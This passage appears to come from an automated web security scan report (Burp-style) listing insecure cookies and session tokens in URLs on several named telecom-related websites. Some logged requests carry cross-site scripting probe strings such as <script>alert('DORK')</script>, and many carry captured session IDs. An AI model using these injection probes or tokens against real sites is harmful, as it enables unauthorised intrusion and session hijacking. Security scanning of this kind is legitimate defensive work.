Date: Thu, 12 May 2011 00:50:21 GMT
Content-Length: 1214
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

8.13. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...

8.14. https://www.nationalnanpa.com/nas/security/user_reg_mail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/user_reg_mail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/security/user_reg_mail.do?method=createNewMode HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: http://nanpa.com/contact_us/mailing_list.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:46 GMT
Server: Apache
Set-Cookie: nanpaid=nqw6NLkhZBxKqvZ56hWlB5TyT0nTqDm8nJLB7XMLvr2plsh2B2xK!-242160596; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13206


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

8.15. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nationalnanpa.com
Path:   /nas/security/user_reg_pre_mail.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser&nnsStateListHidden=AK&userStageModel.emailAddr=24c54%3Cscript%3Ealert(%22DORK%22)%3C/script%3E508ccbd11b05bf3ba HTTP/1.1
Host: www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:52:55 GMT
Server: Apache
Set-Cookie: nanpaid=Ff09NLvHkTLnGvzy5qzXJQgg3zKQYMGpNzkq02Jv0DG1QM3cfYwz!1521367000; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 5270


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...

9. Session token in URL
There are 12 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://api.demandbase.com/api/v2/ip.json

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://api.demandbase.com
Path:   /api/v2/ip.json

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6%20&callback=dbase_parse HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Thu, 12 May 2011 00:46:48 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Connection: keep-alive
Content-Length: 699

dbase_parse({"city":"Birmingham","zip":"35210","latitude":33.537200927734,"company_name":"Media Visions","demandbase_sid":11633220,"company_size":"$5M - $10M","primary_sic":5065,"registry_city":"Dalla
...[SNIP]...

9.2. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://connectedplanetonline.com
Path:   /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ HTTP/1.1
Host: connectedplanetonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Content-Type: text/html
Content-Length: 53276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6 &callback=dbase_parse"></script>
...[SNIP]...

9.3. http://images.smartname.com/scripts/google_afd_v2.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://images.smartname.com
Path:   /scripts/google_afd_v2.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /scripts/google_afd_v2.js HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tis.org/

Response

HTTP/1.1 200 OK
Cartoon: : aaimage1-new
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3880635792"
Last-Modified: Tue, 03 May 2011 19:40:02 GMT
Content-Length: 16625
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:08 GMT
Connection: close

// get param value from url
function getParam(name) {
var match = new RegExp(name + "=([^&]+)","i").exec(location.search);
if (match==null)
match = new RegExp(name + "=(.+)","i").e
...[SNIP]...
< google_categories.length; i++) {
popularCategories += '<a href="/?domain_name=' + google_afd_response.request.s +
'&q=' + encodeURIComponent(google_categories[i].term) +
'&token=' + google_categories[i].token + '">
' + google_categories[i].term + '</a>
...[SNIP]...

9.4. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&hostname=www.redskye911.com&location=%2Fe911_products%2F&url=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&sessionID=1305162436078.62285&fpc=a449df2-12fe1be4def-5e2048d0-1&ts1305162438995.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 01:07:19 GMT
Connection: keep-alive


9.5. https://lnp.activationnow.com/lnp/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/jsp/logon/login.jsp&#59;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395">http://lnp.activationnow.com/lnp/jsp/logon/login.jsp&#59;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395</a>
...[SNIP]...

9.6. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...

9.7. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.anpisolutions.com%2Fwholesale-voice-and-data-services%2Fsignaling-network-and-database-services%2Fgateway-services%2F&callback=_xdc_._xjyf04&token=74970 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Thu, 12 May 2011 00:46:24 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._xjyf04 && _xdc_._xjyf04( [1] )

9.8. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://support.sprint.com
Path:   /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...
<li><a href="/support;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4">Support</a>
...[SNIP]...
<li><a href="/support/servicepage;jsessionid=E03DE23D7995866D54F37C7F07F26CB3.support4">
                                       
                                           Services
                                   </a>
...[SNIP]...

9.9. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&InvID_Web=9990&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775934648&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.3.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

CheckOut=Check+Out

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:18 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:18 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 30805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head
...[SNIP]...

9.10. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<p>

Members: Please

<a href="https://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/logon/logonstore.html?Time&#61;-1775957737&#38;SessionID&#61;12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g">Login</a>
...[SNIP]...

9.11. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...

9.12. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<p><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store_Front&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">Store Front</a>
...[SNIP]...
<td valign="top" align="left"><a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=9990&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s"><img src="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DACTION/WebsGetImageThumb/Inventory/9990" alt="Camera Strap Black" align="top" border="0">
...[SNIP]...
<div align="left">
                                   OP TECH Weight Reduction System Classic Camera strap with silkscreened NANPA logo ...<a href="http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/ItemDescription.html?Action=Cart_Item_Description&InvID_Web=9990&Template&#61;NANPA Gear&#38;MarketName_W&#61;&#38;MarketCode_W&#61;&#38;AuthorName_W&#61;&#38;PublisherName_W&#61;&#38;ISBN_W&#61;&#38;Start_W&#61;1&#38;End_W&#61;10&#38;NumToShow&#61;10&#38;Volume_W&#61;&#38;KeywordID_W&#61;&Time&#61;-1775933308&#38;SessionID&#61;123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s">More Info</a>
...[SNIP]...
